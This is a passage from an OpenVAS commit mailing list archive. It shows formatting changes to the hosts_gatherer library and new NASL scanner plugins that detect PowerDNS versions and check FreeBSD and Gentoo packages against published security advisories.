in6_addr * ip, - char * hostname, int sz) +int +hg_next_host (struct hg_globals * globals, struct in6_addr * ip, + char * hostname, int sz) { struct hg_host * host; - if(!globals) return -1; #ifdef DEBUG_HIGH @@ -119,7 +117,6 @@ struct hg_host * first = host; unsigned int i; - i = 0; again: host = first; @@ -159,7 +156,6 @@ hg_dns_axfr_add_hosts(globals, host->domain); } - if(!host->use_max || IN6_ARE_ADDR_EQUAL(&host->in6addr, &host->max6)) host->tested = 1; host->alive = 1; @@ -226,15 +222,16 @@ } /** - * Frees all the hosts and info associated to the hg_globals globals. + * @brief Frees all the hosts and info associated to the hg_globals globals. */ -void hg_cleanup(struct hg_globals * globals) +void +hg_cleanup (struct hg_globals * globals) { struct hg_host * hosts = globals->host_list; struct hg_host * tested = globals->tested; free(globals->input); free(globals); - + hg_hosts_cleanup(hosts); hg_hosts_cleanup(tested); } Modified: trunk/openvas-libraries/hg/hosts_gatherer.h =================================================================== --- trunk/openvas-libraries/hg/hosts_gatherer.h 2010-01-07 07:25:54 UTC (rev 6333) +++ trunk/openvas-libraries/hg/hosts_gatherer.h 2010-01-07 08:31:35 UTC (rev 6334) @@ -68,10 +68,11 @@ int counter; unsigned int distribute; }; - + struct hg_globals * hg_init(char *, int); int hg_next_host(struct hg_globals *, struct in6_addr *, char *, int); void hg_cleanup (struct hg_globals *); int hg_test_syntax(char * hostname, int flags); + #endif Modified: trunk/openvas-libraries/hg/test.c =================================================================== --- trunk/openvas-libraries/hg/test.c 2010-01-07 07:25:54 UTC (rev 6333) +++ trunk/openvas-libraries/hg/test.c 2010-01-07 08:31:35 UTC (rev 6334) @@ -16,6 +16,13 @@ * Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. */ + +#include <stdio.h> /* for printf */ +#include <stdlib.h> /* for exit */ +#include <unistd.h> /* for getopt */ +#include <arpa/inet.h> /* for inet_ntoa */ + +#include "network.h" #include "hosts_gatherer.h" /** @@ -31,48 +38,47 @@ */ extern int optind; -int main(int argc, char * argv[]) +int main (int argc, char * argv[]) { - struct hg_globals * globals; - char m[1024]; - int e; - int i; - int flags = 0; - + struct hg_globals * globals; + char m[1024]; + int e; + int i; + int flags = 0; + struct in_addr ip; - while((i=getopt(argc, argv, "dpsnD"))!=-1) /* RATS: ignore */ - switch(i) - { - case 'd' : flags |= HG_DNS_AXFR;break; - case 'p' : flags |= HG_PING;break; - case 's' : flags |= HG_SUBNET;break; - case 'n' : flags |= HG_REVLOOKUP; - case 'D' : flags |= HG_DISTRIBUTE; - } - if(!argv[optind]) - { - printf("Usage : test -dps hostname/netmask\n-d : DNS axfr\n-p : ping hosts\n\ --s : whole network\n-D: distribute the load\n"); + while ((i=getopt(argc, argv, "dpsnD"))!=-1) /* RATS: ignore */ + switch (i) + { + case 'd' : flags |= HG_DNS_AXFR;break; + case 'p' : flags |= HG_PING;break; + case 's' : flags |= HG_SUBNET;break; + case 'n' : flags |= HG_REVLOOKUP; + case 'D' : flags |= HG_DISTRIBUTE; + } + + if (!argv[optind]) + { + printf ("Usage : test -dps hostname/netmask\n-d : DNS axfr\n-p : ping hosts\n-s : whole network\n-D: distribute the load\n"); exit(0); } if((flags & HG_PING)&&geteuid()){ - printf("the ping flag will be ignored -- you are not root\n"); + printf("the ping flag will be ignored -- you are not root\n"); } - - if(hg_test_syntax(argv[optind], flags) < 0 ) - { - printf("BAD SYNTAX\n"); - exit(1); - } + if (hg_test_syntax (argv[optind], flags) < 0 ) + { + printf ("BAD SYNTAX\n"); + exit (1); + } globals = hg_init(argv[optind], flags); e = hg_next_host(globals,&ip, m, sizeof(m)); - while(e >= 0) - { - printf("%s (%s)\n", m, inet_ntoa(ip)); - e = hg_next_host(globals,&ip, m, sizeof(m)); - } - hg_cleanup(globals); + while (e >= 0) + { + printf ("%s (%s)\n", m, inet_ntoa(ip)); + e = hg_next_host (globals,&ip, m, sizeof(m)); + } + hg_cleanup (globals); return 0; } From scm-commit at wald.intevation.org Thu Jan 7 10:13:53 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 7 Jan 2010 10:13:53 +0100 (CET) Subject: [Openvas-commits] r6335 - trunk/openvas-libraries/hg Message-ID: <20100107091353.DC2B886607A4@pyrosoma.intevation.org> Author: felix Date: 2010-01-07 10:13:49 +0100 (Thu, 07 Jan 2010) New Revision: 6335 Modified: trunk/openvas-libraries/hg/Makefile trunk/openvas-libraries/hg/hosts_gatherer.h trunk/openvas-libraries/hg/test.c Log: * hg/host_gatherer.h: Formatting. * hg/Makefile: For clean target, remove test executable. * hg/test.c: Formatted, updated doc. Modified: trunk/openvas-libraries/hg/Makefile =================================================================== --- trunk/openvas-libraries/hg/Makefile 2010-01-07 08:31:35 UTC (rev 6334) +++ trunk/openvas-libraries/hg/Makefile 2010-01-07 09:13:49 UTC (rev 6335) @@ -74,5 +74,5 @@ distclean : clean clean : - @rm -f OBJ/* lib*.a *~ *core *.lo *.o lib*.la + @rm -f OBJ/* lib*.a *~ *core *.lo *.o lib*.la test @rm -rf .libs Modified: trunk/openvas-libraries/hg/hosts_gatherer.h =================================================================== --- trunk/openvas-libraries/hg/hosts_gatherer.h 2010-01-07 08:31:35 UTC (rev 6334) +++ trunk/openvas-libraries/hg/hosts_gatherer.h 2010-01-07 09:13:49 UTC (rev 6335) @@ -69,9 +69,9 @@ unsigned int distribute; }; -struct hg_globals * hg_init(char *, int); -int hg_next_host(struct hg_globals *, struct in6_addr *, char *, int); -void hg_cleanup (struct hg_globals *); +struct hg_globals * hg_init (char *, int); +int hg_next_host (struct hg_globals *, struct in6_addr *, char *, int); +void hg_cleanup (struct hg_globals *); int hg_test_syntax(char * hostname, int flags); Modified: trunk/openvas-libraries/hg/test.c =================================================================== --- trunk/openvas-libraries/hg/test.c 2010-01-07 08:31:35 UTC (rev 6334) +++ trunk/openvas-libraries/hg/test.c 2010-01-07 09:13:49 UTC (rev 6335) @@ -27,17 +27,14 @@ /** * @file - * This simple program compiles when you link it against - * the following shared libraries : + * Compile with "make test" after openvas-libraries are installed. * - * -lopenvas_hg - * -lpcap - * -lopenvas - * - * Its purpose is to demonstrate how to use the lib hosts_gatherer + * The purpose of this little program is to demonstrate how to use the + * "hosts_gatherer library". */ extern int optind; + int main (int argc, char * argv[]) { struct hg_globals * globals; @@ -47,38 +44,40 @@ int flags = 0; struct in_addr ip; - while ((i=getopt(argc, argv, "dpsnD"))!=-1) /* RATS: ignore */ + while ((i = getopt (argc, argv, "dpsnD")) != -1) /* RATS: ignore */ switch (i) { - case 'd' : flags |= HG_DNS_AXFR;break; - case 'p' : flags |= HG_PING;break; - case 's' : flags |= HG_SUBNET;break; - case 'n' : flags |= HG_REVLOOKUP; + case 'd' : flags |= HG_DNS_AXFR; break; + case 'p' : flags |= HG_PING; break; + case 's' : flags |= HG_SUBNET; break; + case 'n' : flags |= HG_REVLOOKUP; /** @TODO forgot to break here? */ case 'D' : flags |= HG_DISTRIBUTE; } - if (!argv[optind]) - { - printf ("Usage : test -dps hostname/netmask\n-d : DNS axfr\n-p : ping hosts\n-s : whole network\n-D: distribute the load\n"); - exit(0); - } - if((flags & HG_PING)&&geteuid()){ - printf("the ping flag will be ignored -- you are not root\n"); - } + if (!argv[optind]) + { + printf ("Usage : test -dps hostname/netmask\n-d : DNS axfr\n-p : ping hosts\n-s : whole network\n-D: distribute the load\n"); + exit (0); + } + if ((flags & HG_PING) && geteuid ()) + { + printf("the ping flag will be ignored -- you are not root\n"); + } - if (hg_test_syntax (argv[optind], flags) < 0 ) - { - printf ("BAD SYNTAX\n"); - exit (1); - } - globals = hg_init(argv[optind], flags); - e = hg_next_host(globals,&ip, m, sizeof(m)); - while (e >= 0) - { - printf ("%s (%s)\n", m, inet_ntoa(ip)); - e = hg_next_host (globals,&ip, m, sizeof(m)); - } - hg_cleanup (globals); + if (hg_test_syntax (argv[optind], flags) < 0 ) + { + printf ("BAD SYNTAX\n"); + exit (1); + } - return 0; + globals = hg_init (argv[optind], flags); + e = hg_next_host (globals, &ip, m, sizeof (m)); + while (e >= 0) + { + printf ("%s (%s)\n", m, inet_ntoa (ip)); + e = hg_next_host (globals, &ip, m, sizeof (m)); + } + hg_cleanup (globals); + + return 0; } From scm-commit at wald.intevation.org Thu Jan 7 12:29:28 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 7 Jan 2010 12:29:28 +0100 (CET) Subject: [Openvas-commits] r6336 - in trunk/openvas-plugins: . scripts Message-ID: <20100107112928.5E04C86607AD@pyrosoma.intevation.org> Author: mime Date: 2010-01-07 12:29:25 +0100 (Thu, 07 Jan 2010) New Revision: 6336 Added: trunk/openvas-plugins/scripts/pdns_jan_10.nasl trunk/openvas-plugins/scripts/pdns_version.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2010-01-07 09:13:49 UTC (rev 6335) +++ trunk/openvas-plugins/ChangeLog 2010-01-07 11:29:25 UTC (rev 6336) @@ -1,5 +1,11 @@ 2010-01-06 Michael Meyer <michael.meyer at intevation.de> + * scripts/pdns_jan_10.nasl, + scripts/pdns_version.nasl: + Added new plugins. + +2010-01-06 Michael Meyer <michael.meyer at intevation.de> + * scripts/mt_detect.nasl, scripts/snitz_forums_2000_37637.nasl, scripts/mt_37638.nasl: Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2010-01-07 09:13:49 UTC (rev 6335) +++ trunk/openvas-plugins/cve_current.txt 2010-01-07 11:29:25 UTC (rev 6336) @@ -471,3 +471,5 @@ 37383 Greenbone svn R 37637 Greenbone svn R 37638 Greenbone svn R +CVE-2009-4010 Greenbone svn R +CVE-2009-4009 Greenbone svn R Added: trunk/openvas-plugins/scripts/pdns_jan_10.nasl =================================================================== --- trunk/openvas-plugins/scripts/pdns_jan_10.nasl 2010-01-07 09:13:49 UTC (rev 6335) +++ trunk/openvas-plugins/scripts/pdns_jan_10.nasl 2010-01-07 11:29:25 UTC (rev 6336) @@ -0,0 +1,97 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# PowerDNS multiple vulnerabilities January 2010 +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100433); + script_bugtraq_id(37653,37650); + script_cve_id("CVE-2009-4010","CVE-2009-4009"); + script_version ("1.0-$Revision$"); + + script_name("PowerDNS multiple vulnerabilities January 2010"); + +desc = "Overview: +PowerDNS is prone to a remote cache-poisoning vulnerability and to a +Buffer Overflow Vulnerability. + +An attacker can exploit the remote cache-poisoning vulnerability to +divert data from a legitimate site to an attacker-specified site. +Successful exploits will allow the attacker to manipulate cache data, +potentially facilitating man-in-the-middle, site-impersonation, or denial-of- +service attacks. + +Successfully exploiting of the Buffer Overflow vulnerability allows a +remote attacker to execute arbitrary code with superuser privileges, +resulting in a complete compromise of the affected computer. Failed +exploits will cause a denial of service. + +PowerDNS 3.1.7.1 and earlier are vulnerable. + +Solution: +Updates are available. Please see the references for details. + +References: +http://www.securityfocus.com/bid/37653 +http://www.securityfocus.com/bid/37650 +http://www.powerdns.com/ +http://doc.powerdns.com/powerdns-advisory-2010-02.html +http://www.securityfocus.com/archive/1/508743 + + +Risk factor : High"; + + script_description(desc); + script_summary("Determine if PowerDNS version is < 3.1.7.2 "); + script_category(ACT_GATHER_INFO); + script_family("General"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("pdns_version.nasl"); + script_require_keys("powerdns/version"); + exit(0); +} + +include("version_func.inc"); + +udpPort = 53; +if(!get_udp_port_state(udpPort)){ + exit(0); +} + +bindVer = get_kb_item("powerdns/version"); +if(!bindVer){ + exit(0); +} + +if("Recursor" >!< bindVer)exit(0); +version = eregmatch(pattern:"([0-9.]+)", string: bindVer); +if(isnull(version[1]))exit(0); + +if(version_is_less(version:version[1], test_version:"3.1.7.2") ) { + security_warning(port:udpPort, proto:"udp"); + exit(0); +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/pdns_jan_10.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/pdns_version.nasl =================================================================== --- trunk/openvas-plugins/scripts/pdns_version.nasl 2010-01-07 09:13:49 UTC (rev 6335) +++ trunk/openvas-plugins/scripts/pdns_version.nasl 2010-01-07 11:29:25 UTC (rev 6336) @@ -0,0 +1,156 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Detection of PowerDNS +# +# Authors: +# Michael Meyer +# +# Based on bind_version.nasl from Noam Rathaus <noamr at securiteam.com> +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + + desc = "Overview: +The PowerDNS Nameserver is running at this host. + +The PowerDNS Nameserver allow remote users to query for version and +type information. The query of the CHAOS TXT record 'version.bind', +or 'version.pdns' will typically prompt the server to send the +information back to the querying source. + +Solution: +Set 'version-string' in pdns.conf or recursor.conf. + +See also: +http://www.powerdns.com/ + +Risk factor : None"; + +if (description) +{ + script_id(100432); + script_version ("1.0-$Revision$"); + script_name("PowerDNS Detection"); + script_description(desc); + script_summary("Check for the version of PowerDNS"); + script_category(ACT_GATHER_INFO); + script_family("Service detection"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("find_service.nes","dns_server.nasl"); + exit(0); +} + +include("misc_func.inc"); + + soctcp53 = 0; + + if(get_port_state(53)) + { + soctcp53 = open_sock_tcp(53); + } + if(!soctcp53){ + if(!(get_udp_port_state(53)))exit(0); + socudp53 = open_sock_udp(53); + soc = socudp53; + offset = 0; + } + else { + soc = soctcp53; + offset = 2; + } + + if (soc) + { + + raw_data = raw_string( + 0x00, 0x0A, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x07); + + if(offset)raw_data = raw_string(0x00, 0x1E) + raw_data; + + raw_data = raw_data + "VERSION"; + raw_data = raw_data + raw_string( 0x04 ); + raw_data = raw_data + "PDNS"; + raw_data = raw_data + raw_string(0x00, 0x00, 0x10, 0x00, 0x03); + + send(socket:soc, data:raw_data); + result = recv(socket:soc, length:1000); + if (result) + { + if ((result[0+offset] == raw_string(0x00)) && (result[1+offset] == raw_string(0x0A))) + { + if (((result[2+offset] == raw_string(0x81))||(result[2+offset] == raw_string(0x84))) && ((result[3+offset] == raw_string(0x80))||(result[3+offset] == raw_string(0x00)))) + { + if ((result[4+offset] == raw_string(0x00)) && (result[5+offset] == raw_string(0x01))) + { + if ((result[6+offset] == raw_string(0x00)) && (result[7+offset] == raw_string(0x01))) + { + if(result[30+offset]>=0xc0)base=40; + else base=52; + size = ord(result[base+1+offset]); + slen = base + 3 + offset - 1; + if(slen > strlen(result))exit(0); + if (size > 0) + { + hole_data = ""; + for (i = 0; i < size - 1; i = i + 1) + { + hole_data = hole_data + result[base+3+i+offset]; + } + if(offset)proto = "tcp"; + else proto = "udp"; + + if("powerdns" >!< tolower(hole_data))exit(0); + + version = eregmatch(pattern: "(PowerDNS [a-zA-Z ]*[0-9.]+)", string: hole_data, icase: TRUE); + if(isnull(version[1]))exit(0); + + info = string("None\n\nPowerDNS Version '"); + info += version[1]; + info += string("' was detected on the remote Host\n\n"); + + desc = ereg_replace( + string:desc, + pattern:"None$", + replace:info + ); + + set_kb_item(name:"powerdns/version",value:version[1]); + num_version = eregmatch(pattern:"([0-9.]+)", string: version[1]); + + if("Recursor" >< version[1]) { + set_kb_item(name:string("cpe:/a:powerdns:recursor:",num_version[1]), value: TRUE); + } else { + set_kb_item(name:string("cpe:/a:powerdns:powerdns:",num_version[1]), value: TRUE); + } + + security_note(port:53, data:desc, protocol:proto); + close(soc); + exit(0); + } + } + } + } + } + close(soc); + exit(0); + } + } + +exit(0); Property changes on: trunk/openvas-plugins/scripts/pdns_version.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision From scm-commit at wald.intevation.org Thu Jan 7 12:33:23 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 7 Jan 2010 12:33:23 +0100 (CET) Subject: [Openvas-commits] r6337 - in trunk/openvas-plugins: . scripts Message-ID: <20100107113323.B8B5E86607AD@pyrosoma.intevation.org> Author: mime Date: 2010-01-07 12:33:21 +0100 (Thu, 07 Jan 2010) New Revision: 6337 Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/scripts/pdns_jan_10.nasl Log: Changed security_warning() to security_hole() Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2010-01-07 11:29:25 UTC (rev 6336) +++ trunk/openvas-plugins/ChangeLog 2010-01-07 11:33:21 UTC (rev 6337) @@ -1,5 +1,10 @@ -2010-01-06 Michael Meyer <michael.meyer at intevation.de> +2010-01-07 Michael Meyer <michael.meyer at intevation.de> + * scripts/pdns_jan_10.nasl: + Changed security_warning() to security_hole(). + +2010-01-07 Michael Meyer <michael.meyer at intevation.de> + * scripts/pdns_jan_10.nasl, scripts/pdns_version.nasl: Added new plugins. Modified: trunk/openvas-plugins/scripts/pdns_jan_10.nasl =================================================================== --- trunk/openvas-plugins/scripts/pdns_jan_10.nasl 2010-01-07 11:29:25 UTC (rev 6336) +++ trunk/openvas-plugins/scripts/pdns_jan_10.nasl 2010-01-07 11:33:21 UTC (rev 6337) @@ -90,7 +90,7 @@ if(isnull(version[1]))exit(0); if(version_is_less(version:version[1], test_version:"3.1.7.2") ) { - security_warning(port:udpPort, proto:"udp"); + security_hole(port:udpPort, proto:"udp"); exit(0); } From scm-commit at wald.intevation.org Thu Jan 7 13:59:35 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 7 Jan 2010 13:59:35 +0100 (CET) Subject: [Openvas-commits] r6338 - in trunk/openvas-plugins: . scripts Message-ID: <20100107125935.BD33C86607C3@pyrosoma.intevation.org> Author: reinke Date: 2010-01-07 13:59:33 +0100 (Thu, 07 Jan 2010) New Revision: 6338 Added: trunk/openvas-plugins/scripts/freebsd_pear-Net_Ping.nasl trunk/openvas-plugins/scripts/glsa_201001_01.nasl trunk/openvas-plugins/scripts/glsa_201001_02.nasl trunk/openvas-plugins/scripts/glsa_201001_03.nasl Modified: trunk/openvas-plugins/ChangeLog Log: New scripts added Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2010-01-07 11:33:21 UTC (rev 6337) +++ trunk/openvas-plugins/ChangeLog 2010-01-07 12:59:33 UTC (rev 6338) @@ -1,3 +1,11 @@ +2009-12-14 Thomas Reinke <reinke at securityspace.com> + + * scripts/freebsd_pear-Net_Ping.nasl, + scripts/glsa_201001_01.nasl, + scripts/glsa_201001_02.nasl, + scripts/glsa_201001_03.nasl: + New scripts. + 2010-01-07 Michael Meyer <michael.meyer at intevation.de> * scripts/pdns_jan_10.nasl: Added: trunk/openvas-plugins/scripts/freebsd_pear-Net_Ping.nasl =================================================================== --- trunk/openvas-plugins/scripts/freebsd_pear-Net_Ping.nasl 2010-01-07 11:33:21 UTC (rev 6337) +++ trunk/openvas-plugins/scripts/freebsd_pear-Net_Ping.nasl 2010-01-07 12:59:33 UTC (rev 6338) @@ -0,0 +1,98 @@ +# +#VID 56ba8728-f987-11de-b28d-00215c6a37bb +# OpenVAS Vulnerability Test +# $ +# Description: Auto generated from VID 56ba8728-f987-11de-b28d-00215c6a37bb +# +# Authors: +# Thomas Reinke <reinke at securityspace.com> +# +# Copyright: +# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisories, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(66644); + script_cve_id("CVE-2009-4024", "CVE-2009-4025"); + script_bugtraq_id(37093,37094); + script_version ("$Revision$"); + script_name("FreeBSD Ports: pear-Net_Ping"); + + desc = "The remote host is missing an update to the system +as announced in the referenced advisory. + +The following packages are affected: + pear-Net_Ping + pear-Net_Traceroute + +CVE-2009-4024 +Argument injection vulnerability in the ping function in Ping.php in +the Net_Ping package before 2.4.5 for PEAR allows remote attackers to +execute arbitrary shell commands via the host parameter. + +CVE-2009-4025 +Argument injection vulnerability in the traceroute function in +Traceroute.php in the Net_Traceroute package before 0.21.2 for PEAR +allows remote attackers to execute arbitrary shell commands via the +host parameter. NOTE: some of these details are obtained from third +party information. + +Solution: +Update your system with the appropriate patches or +software upgrades. + +http://pear.php.net/advisory20091114-01.txt +http://www.vuxml.org/freebsd/56ba8728-f987-11de-b28d-00215c6a37bb.html + +Risk factor : High"; + + script_description(desc); + + script_summary("FreeBSD Ports: pear-Net_Ping"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com"); + script_family("FreeBSD Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/freebsdrel"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-bsd.inc"); +vuln = 0; +bver = portver(pkg:"pear-Net_Ping"); +if(!isnull(bver) && revcomp(a:bver, b:"2.4.5")<0) { + security_note(0, data:"Package pear-Net_Ping version " + bver + " is installed which is known to be vulnerable."); + vuln = 1; +} +bver = portver(pkg:"pear-Net_Traceroute"); +if(!isnull(bver) && revcomp(a:bver, b:"0.21.2")<0) { + security_note(0, data:"Package pear-Net_Traceroute version " + bver + " is installed which is known to be vulnerable."); + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/glsa_201001_01.nasl =================================================================== --- trunk/openvas-plugins/scripts/glsa_201001_01.nasl 2010-01-07 11:33:21 UTC (rev 6337) +++ trunk/openvas-plugins/scripts/glsa_201001_01.nasl 2010-01-07 12:59:33 UTC (rev 6338) @@ -0,0 +1,80 @@ +# +# OpenVAS Vulnerability Test +# $ +# Description: Auto generated from Gentoo's XML based advisory +# +# Authors: +# Thomas Reinke <reinke at securityspace.com> +# +# Copyright: +# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisories, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + + +if(description) +{ + script_id(66639); + script_cve_id("CVE-2009-3563"); + script_version ("$Revision$"); + script_name("Gentoo Security Advisory GLSA 201001-01 (ntp)"); + + desc = "The remote host is missing updates announced in +advisory GLSA 201001-01. + +A Denial of Service condition in ntpd can cause excessive CPU or bandwidth +consumption. + +Solution: +All NTP users should upgrade to the latest version: + + # emerge --sync + # emerge --ask --oneshot --verbose '>=net-misc/ntp-4.2.4_p7-r1' + +http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201001-01 +http://bugs.gentoo.org/show_bug.cgi?id=290881 + +Risk factor : Medium"; + + script_description(desc); + + script_summary("Gentoo Security Advisory GLSA 201001-01 (ntp)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com"); + script_family("Gentoo Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/gentoo"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-gentoo.inc"); +vuln = 0; +if(ispkgvuln(pkg:"net-misc/ntp", unaffected: make_list("ge 4.2.4_p7-r1"), vulnerable: make_list("lt 4.2.4_p7-r1"))) { + vuln=1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/glsa_201001_02.nasl =================================================================== --- trunk/openvas-plugins/scripts/glsa_201001_02.nasl 2010-01-07 11:33:21 UTC (rev 6337) +++ trunk/openvas-plugins/scripts/glsa_201001_02.nasl 2010-01-07 12:59:33 UTC (rev 6338) @@ -0,0 +1,80 @@ +# +# OpenVAS Vulnerability Test +# $ +# Description: Auto generated from Gentoo's XML based advisory +# +# Authors: +# Thomas Reinke <reinke at securityspace.com> +# +# Copyright: +# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisories, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + + +if(description) +{ + script_id(66640); + script_cve_id("CVE-2009-3794", "CVE-2009-3796", "CVE-2009-3797", "CVE-2009-3798", "CVE-2009-3799", "CVE-2009-3800"); + script_version ("$Revision$"); + script_name("Gentoo Security Advisory GLSA 201001-02 (adobe-flash)"); + + desc = "The remote host is missing updates announced in +advisory GLSA 201001-02. + +Multiple vulnerabilities in Adobe Flash Player might allow remote attackers +to execute arbitrary code or cause a Denial of Service. + +Solution: +All Adobe Flash Player users should upgrade to the latest version: + + # emerge --sync + # emerge --ask --oneshot --verbose '>=www-plugins/adobe-flash-10.0.42.34' + +http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201001-02 +http://bugs.gentoo.org/show_bug.cgi?id=296407 + +Risk factor : Medium"; + + script_description(desc); + + script_summary("Gentoo Security Advisory GLSA 201001-02 (adobe-flash)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com"); + script_family("Gentoo Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/gentoo"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-gentoo.inc"); +vuln = 0; +if(ispkgvuln(pkg:"www-plugins/adobe-flash", unaffected: make_list("ge 10.0.42.34"), vulnerable: make_list("lt 10.0.42.34"))) { + vuln=1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/glsa_201001_03.nasl =================================================================== --- trunk/openvas-plugins/scripts/glsa_201001_03.nasl 2010-01-07 11:33:21 UTC (rev 6337) +++ trunk/openvas-plugins/scripts/glsa_201001_03.nasl 2010-01-07 12:59:33 UTC (rev 6338) @@ -0,0 +1,96 @@ +# +# OpenVAS Vulnerability Test +# $ +# Description: Auto generated from Gentoo's XML based advisory +# +# Authors: +# Thomas Reinke <reinke at securityspace.com> +# +# Copyright: +# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisories, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + + +if(description) +{ + script_id(66641); + script_cve_id("CVE-2008-5498", "CVE-2008-5514", "CVE-2008-5557", "CVE-2008-5624", "CVE-2008-5625", "CVE-2008-5658", "CVE-2008-5814", "CVE-2008-5844", "CVE-2008-7002", "CVE-2009-0754", "CVE-2009-1271", "CVE-2009-1272", "CVE-2009-2626", "CVE-2009-2687", "CVE-2009-3291"); + script_version ("$Revision$"); + script_name("Gentoo Security Advisory GLSA 201001-03 (php)"); + + desc = "The remote host is missing updates announced in +advisory GLSA 201001-03. + +Multiple vulnerabilities were found in 